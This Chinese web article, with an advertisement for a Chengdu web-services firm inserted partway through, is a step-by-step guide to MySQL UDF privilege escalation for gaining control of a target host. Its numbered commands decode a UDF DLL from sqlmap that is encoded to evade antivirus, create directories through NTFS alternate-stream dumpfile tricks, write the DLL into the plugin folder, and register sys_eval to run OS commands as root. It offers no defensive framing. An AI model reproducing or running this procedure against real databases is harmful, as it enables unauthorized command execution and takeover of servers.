本文主要给大家介绍MySQL中UDF提权获取主机控制权的详细步骤,文章内容都是笔者用心摘选和编辑的,具有一定的针对性,对大家的参考意义还是比较大的,下面跟笔者一起了解下MySQL中UDF提权获取主机控制权的详细步骤吧。
成都创新互联公司专注为客户提供全方位的互联网综合服务,包含不限于网站建设、网站制作、伊金霍洛网络推广、微信小程序开发、伊金霍洛网络营销、伊金霍洛企业策划、伊金霍洛品牌公关、搜索引擎seo、人物专访、企业宣传片、企业代运营等,从售前售中售后,我们都将竭诚为您服务,您的肯定,是我们最大的嘉奖;成都创新互联公司为所有大学生创业者提供伊金霍洛建站搭建服务,24小时服务热线:028-86922220,官方网址:www.cdcxhl.com
1、python clock.py -d -i lib_mysqludfsys.dll
此步是获取***用的UDF dll。首先要安装sqlmap,然后运行上述命令即可得到解码之后的UDF dll。(sqlmap对其进行编码是为了免杀)
2、mysql -h target_ip -uroot -p
与目标MySQL建立连接
3、select version();
查看MySQL版本
4、select @@basedir;
查看MySQL的安装目录。假设为 c:\program files\mysql\mysql server 5.1
5、select @@plugin_dir;
查看MySQL的插件目录。假设为c:\program files\mysql\mysql server 5.1\plugin
6、select 'it is dll' into dumpfile 'c:\program files\mysql\mysql server 5.1\lib::$INDEX_ALLOCATION';
创建lib目录
7、select 'it is dll' into dumpfile 'c:\program files\mysql\mysql server 5.1\plugin::$INDEX_ALLOCATION';
创建plugin目录
8、select unhex('hex_of_udf.dll') into dumpfile "c:\program files\mysql\mysql server 5.1\plugin\udf.dll";
创建udf.dll,上述命令中hex_of_udf.dll是udf.dll的十六进制文本,可用winhex等编辑软件获得
9、create function sys_eval returns string soname 'udf.dll';
创建函数
10、select sys_eval('whoami');
执行shell命令,表明以获取操作系统的控制权
看完以上关于MySQL中UDF提权获取主机控制权的详细步骤,很多读者朋友肯定多少有一定的了解,如需获取更多的行业知识信息 ,可以持续关注我们的行业资讯栏目的。